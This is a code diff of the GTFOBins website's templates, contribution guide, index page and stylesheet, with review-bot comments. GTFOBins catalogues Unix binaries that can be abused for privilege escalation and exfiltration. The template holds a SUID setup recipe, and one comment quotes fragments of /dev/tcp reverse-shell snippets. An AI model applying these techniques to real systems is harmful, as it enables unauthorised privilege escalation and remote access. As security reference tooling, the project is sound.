{% include function_list.html bin=page %}
{{ page.description | markdownify }}
{% for function in page.functions %}
{% assign function_name = function[0] %}
{% assign examples = function[1] %}
<h2 id="{{ function_name }}" class="function-name">
{{- site.data.functions[function_name].label -}}
</h2>
{{ site.data.functions[function_name].description | markdownify }}
{% for example in examples %}
<div class="example">
{{ example.description | markdownify }}
{% capture code %}
{%- if function_name == 'suid-enabled' or function_name == 'suid-limited' %}
cp $(which {{ bin_name }}) .
sudo chown 0 ./{{ bin_name }}
sudo chmod +s ./{{ bin_name }}
{% endif %}
{{ example.code }}
{% endcapture %}
<pre><code>
{{- code | strip -}}
</code></pre>
</div>
{% endfor %}
{% endfor %}
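Review bot: `{{- code | strip -}}` emits the example code into `<pre><code>` without HTML escaping; Liquid output is not escaped by default, so examples containing `<`, `>` or `&` — the `/dev/tcp` ones in `bash.md` (`cat 0<&3`, `exec 5<>/dev/tcp/...`), tclsh's `<@stdin >@stdout`, the `>&` redirections, php's `<&3 >&3` — are parsed as markup and rendered garbled or truncated. Escape at the output point: `{{- code | strip | escape -}}`. The SUID preamble's `$(which {{ bin_name }})` also assumes the binary is on `PATH`, which does not hold for `ld.so`.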

22
_layouts/common.html Normal file

@ -0,0 +1,22 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>
{{ site.title }}
{% if page.url != '/' %}
|
{% if page.layout == 'bin' %}
{{ page.title | downcase }}
{% else %}
{{ page.title }}
{% endif %}
{% endif %}
</title>
<link rel="stylesheet" href="/style.css" type="text/css"/>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, user-scalable=yes">
</head>
<body>
{{ content }}
</body>
</html>
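Review bot: The `<title>` for bin pages uses `page.title | downcase`, but the `_gtfobins/*.md` front matter never sets `title` (the visible heading comes from `get_bin_name` applied to `page.path` in `_layouts/bin.html`), so bin pages appear to get a `GTFOBins |` title with nothing after the separator — please confirm on a built page. Deriving the name the same way here, e.g. `{% include get_bin_name path=page.path %}` in the `bin` branch, keeps the title and heading in sync.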

7
_layouts/page.html Normal file

@ -0,0 +1,7 @@
---
layout: common
---
{% include page_title.html title=page.title %}
{{ content }}

45
contribute.md Normal file

@ -0,0 +1,45 @@
---
layout: page
title: Contribute
---
## Structure
Each GTFO binary is defined in a file in the `_gtfobins/` folder named as `<binary name>.md`, such file consists only of a [YAML] front matter which describes the binary and its functions.
[YAML]: http://yaml.org/
The full syntax is the following:
```
description: Optional description of the binary
functions:
FUNCTION:
- description: Optional description of the example
code: Code of the example
- ....
FUNCTION:
- description: Optional description of the example
code: Code of the example
- ...
...
```
Where `FUNCTION` is one of the values described in the `_data/functions.yml` file.
Feel free to use any file in the `_gtfobins/` folder as an example.
Pull request process
--------------------
Vendor software is accepted as well as standard Unix binaries. Binaries and techniques that only works on certain operating systems and versions are accepted and such limitations shall be noted in the `description` field.
Before sending a pull request of a new binary or function, ensure the following:
1. Verify the function works on at least one type of modern Unix system.
2. Classifying SUID-related functions may be tricky because they depend on how the default shell behaves on different systems (i.e. Ubuntu vs. Debian) and how the external command is called (i.e. `exec()` family vs. `system()`). Check how the binary behaves:
- The function is considered `suid-enabled` if runs external commands with SUID privileges on Ubuntu Linux.
- The function is considered `suid-limited` if runs external commands with SUID privileges on Debian but it drops the privileges on Ubuntu Linux.
3. Verify `sudo-enabled` function runs external commands under the `sudo` privileged context.
Pull requests adding new functions in `_data/functions.yml` are allowed and subjected to project maintainers vetting.

8
functions.md Normal file

@ -0,0 +1,8 @@
---
layout: page
title: Functions
---
A binary may support one or more of the following functions:
{% include functions_description.html %}

16
index.md Normal file

@ -0,0 +1,16 @@
---
layout: page
title: GTFOBins
---
GTFOBins is a curated list of Unix binaries that can be leveraged by an attacker to bypass system security restrictions.
This was inspired by the [LOLBins and LOLScripts](https://github.com/api0cradle/LOLBAS) project for Windows environment.
The project collects legitimate Unix binaries that can be abused to <strike>get the f**k</strike> break out restricted shells, escalate or maintain elevated privileges, download or exfiltrate files, and facilitate the other post-exploitation tasks outlined [here](/functions/).
GTFOBins aims to be a shared project where everyone can contribute with additional binaries and techniques. You can find detailed instructions [here](/contribute/).
## List of GTFOBins
{% include bin_table.html %}

117
style.scss Normal file

@ -0,0 +1,117 @@
---
---
$accent: #bf0707;
$lighter: #fff4f4;
$hover: #ff0000;
// layout
@media (min-width: 1000px) {
body {
width: 800px;
margin: 0 auto;
}
}
// common tags
body {
font-family: sans, sans-serif;
}
code {
padding: 0.15em 0.25em;
border-radius: 0.25em;
color: $accent;
background: $lighter;
}
pre {
background: $lighter;
padding: 1em;
overflow-x: auto;
code {
padding: 0;
border-radius: 0;
}
}
a:link, a:visited {
color: $accent;
}
a:hover {
color: $hover;
}
// fragment targets
*:target {
border-left: 5px solid $accent;
padding-left: 5px;
}
// binary list and search
#bin-search {
padding: 0.5em;
width: 100%;
box-sizing: border-box;
}
#bin-table {
width: 100%;
th, td {
padding: 0.2em 1em;
}
th {
text-align: left;
}
#search-message {
text-align: center;
padding: 1em;
}
}
// function description
.function-list {
font-size: 0.8rem;
list-style: none;
padding: 0;
margin: 0;
li {
display: inline-block;
padding: 0.25em 0.5em;
margin: 0.05em 0;
border: 1px solid $accent;
a:link, a:visited {
color: $accent;
text-decoration: none;
}
&:hover, a:hover {
color: $hover;
border-color: $hover;
}
}
}
// classes
.bin-name {
font-family: monospace;
font-size: 1.2rem;
}
.function-name {
font-size: 1.4rem;
font-weight: bold;
}